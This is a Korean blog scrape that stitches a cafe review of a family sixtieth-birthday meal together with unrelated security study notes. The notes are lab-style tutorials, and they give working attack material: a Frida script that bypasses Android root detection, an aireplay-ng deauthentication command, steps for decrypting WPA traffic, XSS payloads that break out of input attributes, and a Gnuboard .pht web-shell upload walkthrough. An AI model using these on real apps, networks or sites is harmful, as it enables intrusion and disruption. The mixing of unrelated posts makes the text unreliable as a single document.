지난 설 연휴에 삼촌 회갑을 기념해 친척들까지 대가족 식사를 했어요!
요즘은 좋은 날 가족끼리 식사 겸 파티하는 분위기가 많잖아요.

이번에는 5.2 브런치 카페에서 삼촌 회갑 모임을 하게 됐습니다~

다른 방문객 분들과 독립된 공간도 사용 가능하고, 음식들도 너무 예쁘고 맛있어서 가족들이 다 만족했던 자리였습니다.

카페 공간을 작게 대관한 느낌으로 사용할 수 있어서 삼촌 회갑 포스터도 붙이고 생일파티 분위기도 조금 냈습니다.
큰 행사까지는 아니지만 가족끼리 모여 축하하기에는 딱 좋은 분위기였습니다.

메뉴판

가족 식사는 저녁에 많이들 하는데 브런치 카페가 괜찮을까 생각도 드시죠?

저희도 저녁 식사를 했는데, 막상 보니까 식사 메뉴도 잘 구성되어 있었습니다.

이번에 저희가 주문했던 메뉴는

  • 스테이크샐러드 피자
  • 한돈 목살 과일살사 플레이트
  • 소갈비살토마토볶음
  • 새우듬뿍 감바스
  • 리코타치즈 샐러드

이렇게 몇 가지 구성으로 여러 테이블에 주문해서 가족끼리 나눠 먹었습니다.

지금부터 메뉴 사진 시작되니까 배고프신 분들은 주의하세요 ㅎㅎㅎㅎ

 

이 메뉴는 이름 그대로 샐러드랑 스테이크가 올라간 피자입니다.

패스츄리 도우로 만들어져서 정말 바삭하고 위에 올라간 야채가 신선해서 부담 없이 먹기 좋았습니다.

방문하시게된다면 이 메뉴는 꼭 시키시는걸 추천드려요! (온 가족들이 감탄하면서 먹었답니다! 개인적으로 제 최애 메뉴예요 ㅎㅎ)

 

소갈비랑 토마토를 같이 볶은 메뉴인데 일반적인 한식 느낌보다는 양식 스타일에 가까운 메뉴였습니다.

소갈비가 부드럽고 토마토가 들어가서 느끼하지 않고 전체적으로 담백하면서도 은근히 감칠맛이 있는 맛이었습니다.

고기 메뉴 좋아하시는 분들이라면 같이 곁들여 먹기 괜찮은 메뉴였습니다.

 

감바스도 하나 주문했습니다.

마늘향이랑 올리브오일 향이 잘 올라와서 빵이랑 같이 먹기 딱 좋은 메뉴였습니다.

이름 그대로 새우도 넉넉하게 들어 있어서 새우 좋아하는 분들이면 괜찮게 드실 것 같습니다.

브런치 메뉴들이랑 같이 곁들이기 좋은 메뉴였습니다.

이 샐러드는 비주얼부터 너무 싱그럽게 예뻤는데요.

리코타치즈가 올라간 샐러드인데 꿀이랑 같이 먹는 스타일이라 전체적으로 상큼하고 부드러운 맛이었습니다.

과일을 아끼지 않고 담아주셔서 너무 만족하면서 먹은 메뉴였어요!

고기 메뉴랑 같이 먹으면 중간중간 입가심도 되고 브런치 카페 분위기에도 잘 어울리는 메뉴였습니다.

 

이번 모임이 삼촌 회갑 자리라 그런지 가게에서 김밥이랑 불고기도 같이 준비해 주셨습니다.

덕분에 어른들도 훨씬 편하게 식사하셨고 브런치 메뉴만 있는 카페보다 가족 식사 분위기가 더 살아서 좋았습니다!

 

이번에 와보니 이런 모임에 잘 어울릴 것 같았습니다.

  • 가족 식사 모임
  • 부모님 생일 식사
  • 회갑 / 칠순 같은 가족 행사
  • 브런치 모임
  • 작은 생일파티

요즘 파티룸 대관 비용도 만만치 않은데, 이번 기회에 가성비도 챙기고 맛과 분위기도 챙길 수 있는 좋은 곳 추천 드리고싶습니다!

https://naver.me/5HrHahwA

 

네이버지도

5.2 브런치 카페

map.naver.com

 

카페 분위기라 너무 딱딱하지 않고 음식도 다양해서 가족들이 편하게 식사하기 좋았습니다.

가볍게 브런치 먹으러 와도 좋고 저희처럼 가족 모임이나 생일 자리로 방문해도 괜찮은 곳이었습니다.

(특히나 엘레베이터도 있어서 할머니/할아버지도 편하게 이동하실 수 있는 공간이였어요!)

 

삼촌 회갑 덕분에 오랜만에 친척들까지 다 같이 모여 좋은 시간 보냈습니다. 

평소에도 가족들 잘 챙기시는 삼촌이라 그런지 이런 자리가 더 의미 있게 느껴졌던 것 같습니다.

삼촌의 세번째 스무살을 축하드리며 이만 포스팅 마무리하겠습니다! 삼촌 축하드려용 ㅎㅎ

1. 루팅(rooting)?
- 안드로이드 기기의 최상위 권한인 root 권한을 얻음으로 해당 기기에 걸려있는 제약을 해제하는 행위


2. 루팅(rooting) 탐지?
- 안드로이드 기기에서 루트 권한이 부여된 상태를 감지하는 것으로 대표적으로 아래 방법으로 루팅된 기기를 탐지
- su 명령어 탐지 
- 프로세스 리스트 탐지 
- 루팅 관련 어플 설치 여부 확인 (ex. Superuser, su 등)

 

루팅 탐지 우회를 위한 다양한 방법 중 오늘은 Frida를 이용한 루팅 탐지 우회를 시도해보겠다.

(현재 frida, frida-server 환경을 구축이 되어있다는 전제)

테스트앱 설치 경로 : https://github.com/lpilorz/flutter-app (jailbreak-release.apk 설치)

 

1) 루팅 단말기에서 앱 실행 시 루팅 탐지

 

2) 앱 디패키징 이후 분석을 통해 루팅 탐지 로직 분석 (isRooted() 메서드 사용)

 

3) isRooted() 메서드 오버로드 스크립트 작성

console.log("Loading flutter_jailbreak_detection bypass...");
setImmediate(function() {
  Java.perform(function () {
    var root = Java.use("com.scottyab.rootbeer.RootBeer");
    root.isRooted.overload().implementation = function() {
      console.log("isRooted() called, returning false");
      return false;
    }
  });
});

출처: <https://hackmd.io/@runicpl/flutter-android>

 

4) 스크립트 실행

frida -U -f pl.runic.ip -l frida-flutter-root-bypass.js

 

5) 루팅 탐지가 우회되며 앱 정상 실행

 

[범용적으로 사용 가능한 루팅 탐지 우회 스크립트]

https://codeshare.frida.re/@dzonerzy/fridantiroot/

앞서 진행한 무선 네트워크 패킷 스니핑 시, 개방형 공유기가 아닌 패스워드가 걸려있는 공유기의 경우는 패킷 복호화 과정이 필요했는데 복호화를 위해서는 EAPOL 암호화 키 교환 패킷이 필요하다.

2022.07.21 - [네트워크 공부/공부] - 무선 네트워트 패킷 수집

 

그런데.. 타겟 PC가 언제 공유기와 연결을 끊을지 알고..

무한 대기로 기다릴 수는 없기 때문에...

deauth attack을 이용한 공유기와 타겟 PC의 연결 강제 해제해보자

aireplay-ng -0 4 -a 공유기mac주소 <interface> -c 타겟mac주소 //타겟mac주소 모를 때 ff:ff:ff:ff:ff:ff(전체)

 

※ 간혹 aireplay-ng 사용 시, 채널이 다르다는 경고문 노출됨 -> 무선 랜카드<interface>와 공유기의 채널을 맞춰주면 됨

airodump-ng <interface> //공유기 채널 확인
iwconfig <interface> channel 1 //공유기 채널과 동일한 숫자로 맞춰주기

'네트워크 공부 > 공부' 카테고리의 다른 글

무선 네트워트 패킷 수집  (2) 2022.07.21
cain abel 툴을 이용한 arp spoofing 실습 방법  (3) 2020.07.28
OSI 7계층 (쉽게 외워볼까..?)  (6) 2019.06.24
packet_print  (0) 2019.06.24

managed mode - 나에게 오는 패킷만 수집하는 모드 (기본 설정)

monitor mode - 공기 중에 뿌려지는 모든 패킷을 수집하는 모드

준비 : 모니터 모드를 지원하는 무선 랜카드 (노트북에서 지원하는 경우 별도의 무선 랜카드 준비하지 않아도 됨)

 

[모니터 모드 설정]

윈도우 (cmd 관리자 실행)

netsh wlan show wirelesscapabilities //모니터 모드 지원 여부 확인
wlanhelper "<interface>" mode monitor //모드 변경 -> Success 뜨면 성공

 

리눅스

iwconfig //현재 모드 확인
airmon-ng check kill //모니터 모드 사용 시, 영향 주는 프로세스 종료
ifconfig <interface> down 
ip link set <interface> name <new interface> //인터페이스명 변경 (변경 원하지 않으면 생략 가능)
ifconfig <new interface> up
iwconfig <new interface> mode monitor
ifconfig <new interface> up

 

 

[wireshark로 모니터 모드 패킷 확인]

nmap 설치 시, monitor mode 항목 선택 후 설치 진행

 

wireshark - option에서 무선 랜카드 모니터 모드를 선택 후 패킷 캡처 시작

 

모니터 모드 패킷 수집이 정상적으로 실행되는 것을 확인

 

[공유기에 암호가 걸려있는 경우 802.11 packet 복호화]

edit > preference > protocol > IEEE 802.11 공유기 암호 입력

key type -> wpa-pwd 
key -> password:ssid

 

타겟 PC가 공유기 재접속 시, EAPOL 프로토콜의 1~4 key 값 교환 확인

 

 

패킷 복호화 

'네트워크 공부 > 공부' 카테고리의 다른 글

aireplay-ng를 사용한 deauth attack  (1) 2022.07.21
cain abel 툴을 이용한 arp spoofing 실습 방법  (3) 2020.07.28
OSI 7계층 (쉽게 외워볼까..?)  (6) 2019.06.24
packet_print  (0) 2019.06.24

<reflected XSS로 value 값에 스크립트 삽입 시, XSS 취약점이 발생하는 경우>

1. input박스 value에 스크립트를 넣어 XSS공격 성공시키기 

위와 같이 value 값에 구문을 삽입하여 XSS를 발생시켜야 하는 상황일 때

 

 

value 값에 XSS 기본 스크립트인 <script>alert(document.domain)<script>를 삽입하자 스크립트가 실행되는 것이 아닌 input박스 안에 입력되는 형태로 나타나는 것을 알 수 있다.

 

 

value 안에 값을 넣는 형식이 아닌 XSS 스크립트를 실행시키기 위해서는 먼저 value 입력 형식을 닫아주어야 한다.

스크립트 : "><script>alert(document.domain)<script>

 

 

2. input박스 value에 스크립트를 넣어 XSS공격 성공시키기 (<,>이 필터링 될 때)

위와 같이 value 값에 구문을 삽입하여 XSS를 발생시켜야 하는 상황이고 <,>는 사용할 수 없을 때

<,>를 인코딩하는 등 다양한 방법으로 시도했지만 스크립트가 실행되지 않았다.

 

 

스크립트 : "; onmouseover=alert(document.domain)"

 

 

3. type가 input박스 value에 스크립트를 넣어 XSS공격 성공시키기 (<,>이 필터링 될 때)

위와 같이 input 박스가 hidden 상태 일 때

 

 

스크립트 : " onmouseover=alert(document.domain) type="test

value 값에 위 구문을 삽입함으로써 type="hidden"이 우회 가능하다.

E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?

 

다음과 같은 에러가 발생하였을 때의 해결 방법이다.

 

1. 터미널을 열고 모든 프로세스를 종료시킨다. 

# sudo killall apt apt-get

 

위의 방법으로 해결되지 않았을 때

 

2. 하나씩 디렉토리를 삭제해준다.

# sudo rm /var/lib/apt/lists/lock
# sudo rm /var/cache/apt/archives/lock
# sudo rm /var/lib/dpkg/lock*

# sudo dpkg --configure

# sudo apt update

 

해결 완료!

'꿀팁 정리' 카테고리의 다른 글

Sublime Text 코드 정렬 단축키  (0) 2019.07.11

실습 환경 : 그누보드 5.2.9.2

 

실습 환경은 5.2.9.8 버전에서 패치된 pht 파일업로드 취약점을 실습해보기 위해 그누보드 5.2.9.2 버전을 선택했습니다.

실습 환경은 간단하게 게시판만 구축했습니다 ^^!

파일업로드 실습을 위해 확인하던 중 문제점이 2개 발생했습니다.

 

1. 업로드 된 파일의 파일명이 랜덤값으로 변경되어서 저장됨

2. 업로드 경로의 디렉토리 리스팅이 허용되어 있지 않음

 

실습을 위해 1번 파일명이 랜덤값으로 저장되는 부분을 주석처리 해주고 파일명이 원본으로 저장되도록 설정했습니다.

 

/var/www/html/gnuboard/bbs/write_update.php

/* $upload[$i]['file'] = abs(ip2long($_SERVER['REMOTE_ADDR'])).'_'.substr($shuffle,0,8).'_'.replace_filename($filename); */

위의 부분 주석

 

$upload[$i]['file'] = urlencode($filename);

코드 추가 

 

이렇게 변경해주면 업로드 되는 파일의 파일명이 변경없이 그대로 올라갑니다.

 

이제 실습 환경은 구축 완료되었고 본 실습을 들어가보도록 하겠습니다!

 

<실습>

 

 

게시판에 정상적인 이미지 파일을 업로드 해줍니다.

 

 

 

이미지 파일의 경로 확인을 통해 업로드 된 파일이 저장되는 디렉토리의 경로를 확인합니다.

 

 

 

다음으로는 준비해둔 pht 확장자로 만들어진 웹 쉘 파일을 업로드 해줍니다.

 

 

 

확인해둔 경로 뒤의 파일명을 웹쉘 파일명인 attack.pht로 변경해주면 위와 같이 쉘이 실행되는 것을 알 수 있습니다.

 

 

 

dir 명령어를 입력해서 현재 디렉토리 안의 내용을 확인해봅니다.

'웹 공부 > 웹 해킹 공부' 카테고리의 다른 글

Brute Force 공격 & 사전 대입  (0) 2020.08.12
LFI & RFI 취약점  (0) 2019.07.29
디렉토리 노출 취약점 (Directory Listing)  (0) 2019.07.24
파일 다운로드 취약점  (0) 2019.07.24
File Upload 공격, 웹쉘  (0) 2019.07.11

MySQL 데이터 확인

mysql > select * from 테이블명; -> 테이블 안의 전체 데이터 확인

mysql -> select 필드명 from 테이블명; -> 테이블 안의 특정 필드의 데이터 확인

mysql -> select 필드명 from 테이블명 where 조건; -> 테이블안의 조건에 맞는 필드의 데이터 확인

 

MySQL 데이터 추가

mysql > use 데이터베이스명;

mysql > insert into 테이블명 (필드명) values ('데이터');

 

MySQL 데이터 변경

mysql > update 테이블명 set 필드명='데이터' where 조건;

mysql > update test set id='hacker' where id='hackdun';

              -> id 필드의 hacker값을 hackdun으로 변경

 

MySQL 데이터 삭제 

mysql > delete from 테이블명 where 조건;

mysql > delete from test where id='hackdun'; -> id가 hackdun에 해당하는 데이터 삭제

+ Recent posts